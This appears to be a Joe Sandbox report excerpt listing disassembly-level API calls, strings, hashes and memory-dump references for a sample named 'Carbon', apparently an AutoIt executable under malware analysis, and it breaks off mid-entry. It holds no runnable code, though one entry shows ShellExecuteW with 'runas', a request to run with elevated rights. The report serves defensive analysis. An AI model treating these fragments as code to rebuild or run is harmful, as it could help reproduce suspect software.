                                                            • Instruction ID: 1d91399b99da637241221bac98980e67144e72b4f6323d72d84c1929b34c7ce3
                                                            • Opcode Fuzzy Hash: 7a2f59607a753c9a141f386bd2d0624d99fed125e05a59317b4b70c3f9e5253a
                                                            • Instruction Fuzzy Hash: 51622970509341DFC728DF24D094AAABBE5FF88304F14895EE5998B3A1DB71D949CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1509 8f294b-8f29bb CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008F2979
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F299A
                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,008F1727,?), ref: 008F29AE
                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,008F1727,?), ref: 008F29B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: edd17e0f81e2b5a0424272e598f08d1bc011251c9b4f52e6aafb31de8b18c1f9
                                                            • Instruction ID: b54ce5c7202717b5f1f021a5176ebee583eb8f60cd29b877298d9a900fafba36
                                                            • Opcode Fuzzy Hash: edd17e0f81e2b5a0424272e598f08d1bc011251c9b4f52e6aafb31de8b18c1f9
                                                            • Instruction Fuzzy Hash: CDF0DA719653D07AEA3117276C18E372EBDD7CBF60B11005EB904A22A0D6691850EBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009342BC
                                                              • Part of subcall function 008F7467: _wcslen.LIBCMT ref: 008F747A
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008F5123
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                            • String ID: Line %d: $AutoIt - $%%
                                                            • API String ID: 2289894680-2203676808
                                                            • Opcode ID: c14ec42c78700d9deeacb117a9ae61bc773a249ea113cf27099a76db13e67533
                                                            • Instruction ID: 84375239682a9632246cd783375e689d8021394e0003075f639f8ca624d72b62
                                                            • Opcode Fuzzy Hash: c14ec42c78700d9deeacb117a9ae61bc773a249ea113cf27099a76db13e67533
                                                            • Instruction Fuzzy Hash: 6841A271408308AAC320EB34DC45FEF77D8EF94764F10462AF698D2091EB30E6498B97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0095EFD8
                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0095EFE6
                                                            • Sleep.KERNEL32(00000000), ref: 0095EFEE
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0095EFF8
                                                            • Sleep.KERNEL32 ref: 0095F034
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 46d1503cf01d6ae7e09dc59c1eb5ba4f9cdc2c026b1aabd700f39e896786113d
                                                            • Instruction ID: 7df1461e8c53c55eff19daae3e7d98bf6be82a88fe489c42816414be11e61de6
                                                            • Opcode Fuzzy Hash: 46d1503cf01d6ae7e09dc59c1eb5ba4f9cdc2c026b1aabd700f39e896786113d
                                                            • Instruction Fuzzy Hash: EB016D31C09529DBCF04EFB5DC5C9EDBB78BF08312F050455E902B22D0CB3495589B61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008F2853
                                                              • Part of subcall function 008F3DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00932A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 008F3DEF
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                            • GetForegroundWindow.USER32(runas,?,?,?,?,?,009B3204), ref: 00932FC3
                                                            • ShellExecuteW.SHELL32(00000000,?,?,009B3204), ref: 00932FCA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                            • String ID: runas
                                                            • API String ID: 448630720-4000483414
                                                            • Opcode ID: 56e8cfed49a8f578700d0ac5caf0ec3ae594a71cb8e4271590d10885a1c90a07
                                                            • Instruction ID: 55eadef450b6a86659fe3e906cde57ff1124afcd2a2ba566c353fe3198376ae0
                                                            • Opcode Fuzzy Hash: 56e8cfed49a8f578700d0ac5caf0ec3ae594a71cb8e4271590d10885a1c90a07
                                                            • Instruction Fuzzy Hash: E411AF71618348ABCB18FB78EC51E7EBBA4FBD0754F40042EB382D20A2CA649949D753
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,008F4667,SwapMouseButtons,00000004,?), ref: 008F4698
                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,008F4667,SwapMouseButtons,00000004,?), ref: 008F46B9
                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,008F4667,SwapMouseButtons,00000004,?), ref: 008F46DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: ed54f6d0f4a44d7f2073a6f25db54ee7f178e7782c72e8ea9b21b043c8e29608
                                                            • Instruction ID: d24bdd625a6146cfa0e1034fbc6a4383cff8b31d2139a496410f6213a3324b2a
                                                            • Opcode Fuzzy Hash: ed54f6d0f4a44d7f2073a6f25db54ee7f178e7782c72e8ea9b21b043c8e29608
                                                            • Instruction Fuzzy Hash: 1411457561120CBFEB208F68C884EFFBBB8FF12754B10542AB901E7210E2719E50AB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            • Variable must be of type 'Object'., xrefs: 0094384D
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 0-109567571
                                                            • Opcode ID: 6b29a0c6e4a47548c854ad2f9119313cc92266f90d340db3454035c0efb5ea1d
                                                            • Instruction ID: b740cb080bffca32ddff174c4d5d93f825f82c797904c1a767be7e1103e22439
                                                            • Opcode Fuzzy Hash: 6b29a0c6e4a47548c854ad2f9119313cc92266f90d340db3454035c0efb5ea1d
                                                            • Instruction Fuzzy Hash: F8C28A71A00209DFCB24DF68C881BBDB7B1FF58314F248169EA45AB3A1D775AD81CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __Init_thread_footer.LIBCMT ref: 00900492
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            • Opcode ID: 5c50c3c1c8ae7f0f14e50501d0e09d1e861c667ef1b14c1b5596263020d167fe
                                                            • Instruction ID: cc6c5506af06f33dd021b88ccead61798adb2b41b58670bd601f1d8cc1716e13
                                                            • Opcode Fuzzy Hash: 5c50c3c1c8ae7f0f14e50501d0e09d1e861c667ef1b14c1b5596263020d167fe
                                                            • Instruction Fuzzy Hash: DAB26D74A08345CFC724CF28C480B2AB7E1FF99704F14896DEA998B392D775E941DB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 009109B8
                                                              • Part of subcall function 009135F4: RaiseException.KERNEL32(?,?,?,009109DA,?,00000000,?,?,?,?,?,?,009109DA,00000000,009B9728,00000000), ref: 00913654
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 009109D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                            • String ID: Unknown exception
                                                            • API String ID: 3476068407-410509341
                                                            • Opcode ID: ad91649a62b17d109f06df3216e5dd174eefeabcf57f0f19c518263c110bc564
                                                            • Instruction ID: 5bc4ed476dce9d04837162918e2ebd27e64dcd06763cc7aedd50fd779c072b7e
                                                            • Opcode Fuzzy Hash: ad91649a62b17d109f06df3216e5dd174eefeabcf57f0f19c518263c110bc564
                                                            • Instruction Fuzzy Hash: 4CF0C834B0430CB7DF00BAA4E866ADD7BAC5EC0360F504160B928964E2EBB2DAC5C5C0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00978A7C
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00978A83
                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00978C64
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                            • String ID:
                                                            • API String ID: 146820519-0
                                                            • Opcode ID: 606706b32b89ef1b880a18632cc37bfab0acad5588a73f75d8f5e18d82aad150
                                                            • Instruction ID: 33295b159bd4471cf292df06e00fccafcd628c4359615fffa678a6cafd387951
                                                            • Opcode Fuzzy Hash: 606706b32b89ef1b880a18632cc37bfab0acad5588a73f75d8f5e18d82aad150
                                                            • Instruction Fuzzy Hash: 30126E72A083019FC714DF28C485B6ABBE5FF88314F14895DE9898B392DB35ED45CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_strcat
                                                            • String ID:
                                                            • API String ID: 306214811-0
                                                            • Opcode ID: ada1c858150e3f615ebc7c78a2be55792361c202feb6f59255cc32d3ca46a930
                                                            • Instruction ID: 5c7584e4b3eb74aaec1f4d2142346cdc65775802ffd6516551313603511a852f
                                                            • Opcode Fuzzy Hash: ada1c858150e3f615ebc7c78a2be55792361c202feb6f59255cc32d3ca46a930
                                                            • Instruction Fuzzy Hash: B1A16C31604209EFCB18DF18C591AA9BBB5FF85314B60C4ADE94A9F292DB35ED41CF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008F2ABE
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(00000010,00000000), ref: 008F2AC6
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008F2AD1
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008F2ADC
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(00000011,00000000), ref: 008F2AE4
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(00000012,00000000), ref: 008F2AEC
                                                              • Part of subcall function 008F2AF5: RegisterWindowMessageW.USER32(00000004,?,008F2E40), ref: 008F2B4D
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008F2EE6
                                                            • OleInitialize.OLE32 ref: 008F2F04
                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00933018
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID:
                                                            • API String ID: 1986988660-0
                                                            • Opcode ID: c25a8b804a68e20a274f02f28cdf6800422e795d06364ad56b30da96457fe67a
                                                            • Instruction ID: eaabbff81c52f586d77aecc3437f0b0e9d8f85663f60bb954790d59413b66f65
                                                            • Opcode Fuzzy Hash: c25a8b804a68e20a274f02f28cdf6800422e795d06364ad56b30da96457fe67a
                                                            • Instruction Fuzzy Hash: 45718BB0D293858FC398EF79ADA9E263BE1FB58314750812EE109C73B1EB704445AF52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: d0ad50b6681a44932592b49785b36bb8326c73735b898fc436ed1415267caf86
                                                            • Instruction ID: 7702ea5001cc5737cf36ac3910e38558b19680bb1ba63165c5c68c25049b3d71
                                                            • Opcode Fuzzy Hash: d0ad50b6681a44932592b49785b36bb8326c73735b898fc436ed1415267caf86
                                                            • Instruction Fuzzy Hash: 6E319C37900234ABCB24EF68F841AFE73ACEF84760B654459FC04DB288EB315D02C290
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000001,?,00000000), ref: 008F5C4E
                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 008F5C5E
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 20cd0d9c406f0de3616bf56c63af59ddf23de83f5350bb02f556e3259d3dadbe
                                                            • Instruction ID: fe3a1e3b79fd2842cf976df34d0ebae4fb9e6c97cf0f799df322e4b102c535f8
                                                            • Opcode Fuzzy Hash: 20cd0d9c406f0de3616bf56c63af59ddf23de83f5350bb02f556e3259d3dadbe
                                                            • Instruction Fuzzy Hash: 5C316C31A00A09EFDB14CF28C880BA9B7B4FB44B14F148629EA15D7640C771FE94CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008F5033: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008F5123
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 0090FCFC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0090FD0B
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0094FBCA
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer$Kill
                                                            • String ID:
                                                            • API String ID: 3500052701-0
                                                            • Opcode ID: 0eeac1eeeaa90ab7596f82a014c2b1a2d264e0af81990d9d29e63c82a26c0917
                                                            • Instruction ID: 88c728e2a94814517dd955eaff017cc474312545b0a4d4b2e26721719c4a1df1
                                                            • Opcode Fuzzy Hash: 0eeac1eeeaa90ab7596f82a014c2b1a2d264e0af81990d9d29e63c82a26c0917
                                                            • Instruction Fuzzy Hash: D3318470904794AFEB32CF24C865FE6BBECEB02708F1404AED5DD97281C7745A858B11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0092891C,?,009B9CB8,0000000C), ref: 00928A54
                                                            • GetLastError.KERNEL32(?,0092891C,?,009B9CB8,0000000C), ref: 00928A5E
                                                            • __dosmaperr.LIBCMT ref: 00928A89
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                            • String ID:
                                                            • API String ID: 490808831-0
                                                            • Opcode ID: 5b0c70aac207933c4813190faa84eef7eae25563a14b8b3fb2b734a36c2a6d7c
                                                            • Instruction ID: e2e30df611d00da558bb99719db282a40c999f9c26bbb8309a92cb900c67bf48
                                                            • Opcode Fuzzy Hash: 5b0c70aac207933c4813190faa84eef7eae25563a14b8b3fb2b734a36c2a6d7c
                                                            • Instruction Fuzzy Hash: F7014E3362B1705AD6246738B845B7F674E8BC2734F2A411BF814DB1CBDE708C8192A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,00934667,?,00000000,00000000,?,0092978A,?,?,00000002,00000000), ref: 00929714
                                                            • GetLastError.KERNEL32(?,0092978A,?,?,00000002,00000000,?,00925EB1,?,00000000,00000000,00000002,?,?,?), ref: 0092971E
                                                            • __dosmaperr.LIBCMT ref: 00929725
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                            • String ID:
                                                            • API String ID: 2336955059-0
                                                            • Opcode ID: a70a99fa48fdf4ac493177072a0bb0b17b1348dc1407bec8b92c29d7e12fc784
                                                            • Instruction ID: 960355086bd1476d4d74a151acb9ddd0ab625277b5ba23c618a10da84e2b025f
                                                            • Opcode Fuzzy Hash: a70a99fa48fdf4ac493177072a0bb0b17b1348dc1407bec8b92c29d7e12fc784
                                                            • Instruction Fuzzy Hash: 18012832A35124ABCF059F99EC05D6E3B2EDF85330F240209F8109B2D4EA70DD01DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0092D195
                                                            • _free.LIBCMT ref: 0092D1CE
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0092D1D5
                                                            Memory Dump Source
